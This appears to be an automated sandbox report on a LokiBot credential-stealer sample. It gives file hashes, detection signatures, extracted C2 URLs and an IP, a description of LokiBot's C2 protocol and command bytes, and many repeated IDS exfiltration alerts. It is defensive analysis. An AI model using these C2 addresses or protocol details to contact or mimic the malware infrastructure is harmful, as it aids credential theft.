Windows Analysis Report
SCB#89940578.exe

Overview

General Information

Sample name: SCB#89940578.exe
Analysis ID: 1431960
MD5: 8bdfe306f813ba1a65ecf6e1da4085c1
SHA1: 7bca83400323c71ee5bd1d655004a4a762e1c71b
SHA256: 857fd5543f14e01ea3b08d3aca6ee6763042a48d7b04c9f035a4a37a4d2e0039
Tags: exeLoki
Infos:

Detection

Lokibot, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Lokibot
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Loki Password Stealer (PWS), LokiBot "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

AV Detection

barindex
Source: http://kbfvzoboss.bid/alien/fre.php URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php URL Reputation: Label: malware
Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=posts.php"]}
Source: SCB#89940578.exe Joe Sandbox ML: detected
Source: SCB#89940578.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SCB#89940578.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 2_2_00403D74

Networking

barindex
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49736 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49736 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49736 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49736 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49739 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49739 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49739 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49739 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49740 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49740 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49740 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49740 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49742 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49742 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49742 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49742 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49743 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49743 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49743 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49744 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49744 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49750 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49753 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49753 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49753 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49753 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49760 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49760 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49760 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49760 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49785 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 45.77.223.48:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 45.77.223.48:80
